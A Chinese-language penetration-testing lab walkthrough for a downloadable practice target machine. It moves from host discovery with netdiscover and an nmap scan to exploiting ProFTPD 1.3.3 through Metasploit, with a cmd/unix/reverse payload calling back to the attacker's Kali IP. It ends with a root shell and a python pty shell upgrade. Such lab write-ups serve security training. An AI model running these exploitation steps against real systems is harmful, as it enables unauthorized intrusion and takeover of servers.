一、信息收集

1.主机发现

靶机下载链接: https://pan.baidu.com/s/143q3cbZG6-8y8kMk51Lc_Q 提取码: i8hv

（1）Netdiscover：专用的二层发现工具，拥有主动和被动发现两种方式

具体操作如下，查看一下kali的ip

然后使用命令sudo netdiscover，发现了靶机的ip

2.端口扫描，服务识别

（1)使用nmap -A 开放的端口以及靶场操作系统和版本的探测，使用方法：nmap -A 192.168.101.106

二、后渗透

1.根据服务版本搜索相关漏洞

这里用到msfconsole，关于msfconsole介绍：msfconsole又叫MSF终端、The Mctasploit Framework,是目前Metasploit框架最流行的用户接口。

具体用法如下：

(1)在kali输入 msfconsole命令，进入到该框架内

(2)先看看可以利用的脚本，输入 search proftpd 1.3.3（为什么是proftpd 1.3.3，因为之前探测到是这个版本）

(3)由上图，我们进入利用的脚本，选择用序号2的那一个：use 2；然后查看要设置的参数（show options），使用方法如下：

(4)设置一下RHOSTS（目标的地址），输入set RHOSTS 192.168.101.106

(5)设置payload，输入set payload cmd/unix/reverse(反向连接)

(6)查看backdoor需要的参数：show options，发现还需要设置一个监听的地址

(7)设置LHOST：set LHOST 192.168.101.10（kali的ip）

(8)参数设置完成后，输入run，执行攻击，成功进入getshell

(9)查看当前用户拥有的权限：sudo -l，发现当前用户已经是root

优化命令执行终端，执行下面命令进入python交互式(注意要下载python环境才能运行):

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

​